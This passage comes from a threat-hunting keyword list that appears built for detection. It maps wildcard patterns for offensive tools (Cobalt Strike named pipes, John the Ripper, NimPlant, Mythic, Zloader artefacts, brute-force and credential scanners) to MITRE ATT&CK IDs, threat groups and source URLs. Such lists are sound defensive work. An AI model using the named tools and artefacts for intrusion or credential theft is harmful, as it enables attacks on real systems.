T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/anthemtotheego/InlineExecute-Assembly,1,0,N/A,10,10,490,114,2023-07-22T23:25:15Z,2021-07-08T17:40:07Z -*ziiiiizzzib*,offensive_tool_keyword,cobaltstrike,InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in 
process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/anthemtotheego/InlineExecute-Assembly,1,0,N/A,10,10,490,114,2023-07-22T23:25:15Z,2021-07-08T17:40:07Z -*zip2john *,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*--ZipFileName $TrustedDomain.zip*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*zippy.nim*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - 
TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*Zloader-FCVP*,offensive_tool_keyword,Zloader,Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike,T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204,TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003,N/A,N/A,Exploitation tools,https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*zmap -*,greyware_tool_keyword,nmap,ZMap is a fast single packet network scanner designed for Internet-wide network surveys. On a typical desktop computer with a gigabit Ethernet connection. ZMap is capable scanning the entire public IPv4 address space in under 45 minutes. With a 10gigE connection and PF_RING. ZMap can scan the IPv4 address space in under 5 minutes. ZMap operates on GNU/Linux. Mac OS. and BSD. ZMap currently has fully implemented probe modules for TCP SYN scans. ICMP. DNS queries. UPnP. BACNET. and can send a large number of UDP probes. If you are looking to do more involved scans. e.g.. banner grab or TLS handshake. take a look at ZGrab. 
ZMaps sister project that performs stateful application-layer handshakes.,T1046 - T1065 - T1210.002 - T1095 - T1040,TA0002 - TA0007 - TA0008 - TA0011 - TA0001,N/A,N/A,Vulnerability scanner,https://github.com/zmap/zmap,1,0,greyware tool - risks of False positive !,N/A,10,5009,887,2023-09-26T15:13:35Z,2013-01-23T01:30:09Z -*zoom1.msi.gpg*,offensive_tool_keyword,Zloader,Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike,T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204,TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003,N/A,N/A,Exploitation tools,https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*zoom2.dll.gpg*,offensive_tool_keyword,Zloader,Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike,T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204,TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003,N/A,N/A,Exploitation tools,https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*zsh_executor *,offensive_tool_keyword,mythic,mythic C2 agent,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/freyja/,1,0,N/A,10,10,11,6,2023-06-30T16:35:47Z,2022-09-28T17:20:04Z -*zsploit-1.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*zsploit-2.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*ztgrace*changeme*,offensive_tool_keyword,changeme,A default credential scanner.,T1110 - T1114 - T1112 - T1056,TA0001 - TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/ztgrace/changeme,1,1,N/A,N/A,10,1349,264,2021-12-26T10:20:11Z,2016-03-11T17:10:34Z -*ZxKmz4hXp6XKmTPg9lzgYxXN4sFr2pzo*,offensive_tool_keyword,SocialBox-Termux,SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android,T1110.001 - T1110.003 - T1078.003,TA0001 - TA0006 - TA0040,N/A,N/A,Credential Access,https://github.com/samsesh/insta-bf,1,0,N/A,7,1,39,6,2021-12-23T17:41:12Z,2020-11-20T22:22:48Z -*ZXZpZGVuY2UuZmJpLmdvdg==*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*zyn3rgy/LdapRelayScan*,offensive_tool_keyword,LdapRelayScan,Check for LDAP protections regarding the relay of NTLM authentication,T1595 T1590 T1591,N/A,N/A,N/A,Reconnaissance,https://github.com/zyn3rgy/LdapRelayScan,1,1,N/A,8,4,389,51,2023-09-04T05:43:00Z,2022-01-16T06:50:44Z -*zzzteph/weakpass*,offensive_tool_keyword,weakpass,Weakpass collection of tools for bruteforce and hashcracking,T1110 - T1201,TA0006 - TA0002,N/A,N/A,Credential 
Access,https://github.com/zzzteph/weakpass,1,1,N/A,10,3,293,36,2023-03-17T22:45:29Z,2021-08-29T13:07:37Z -*Zzzz Zzzzz Zzzz....*,offensive_tool_keyword,KrakenMask,A sleep obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032). To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.,T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/RtlDallas/KrakenMask,1,0,N/A,9,2,144,28,2023-08-08T15:21:28Z,2023-08-05T19:24:36Z -./beef,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,0,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -./CVE-20* -*,offensive_tool_keyword,POC,CVE POC execution,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Exploitation tools,https://github.com/tangxiaofeng7/CVE-2022-22965-Spring-CachedintrospectionResults-Rce,1,0,N/A,N/A,1,37,14,2022-04-01T08:44:19Z,2022-04-01T07:55:26Z -./radare *,offensive_tool_keyword,RadareEye,Tool for especially scanning nearby devices and execute a given command on its own system while the target device comes in range.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Network Exploitation tools,https://github.com/souravbaghz/RadareEye,1,0,N/A,N/A,4,338,50,2021-12-11T06:16:37Z,2021-01-07T04:52:58Z -.exe -t keepass -f *,offensive_tool_keyword,SharPersist,SharPersist Windows persistence toolkit written in C#.,T1547 - T1053 - T1027 - T1028 - T1112,TA0003 - TA0008,N/A,N/A,Persistence,https://github.com/fireeye/SharPersist,1,0,N/A,10,10,1150,233,2023-08-11T00:52:09Z,2019-06-21T13:32:14Z -/adhunt.py,offensive_tool_keyword,adhunt,Tool for exploiting Active Directory Enviroments - enumeration,T1018 - T1087 - T1087.002 - T1069 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,AD 
Enumeration,https://github.com/karendm/ADHunt,1,1,N/A,7,1,41,8,2023-08-10T18:55:39Z,2023-06-20T13:24:10Z -\\demoagent_11,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\\demoagent_22,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - 
T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\\DserNamePipe*,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\\f4c3*,offensive_tool_keyword,cobaltstrike,pipe 
names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\\f53f*,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - 
T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\\fullduplex_*,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\\interprocess_*,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a 
network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\\lsarpc_*,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\\mojo_*,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\\msagent_*,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - 
T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\\MsFteWds*,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - 
Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\\msrpc_*,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\\MSSE-*,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - 
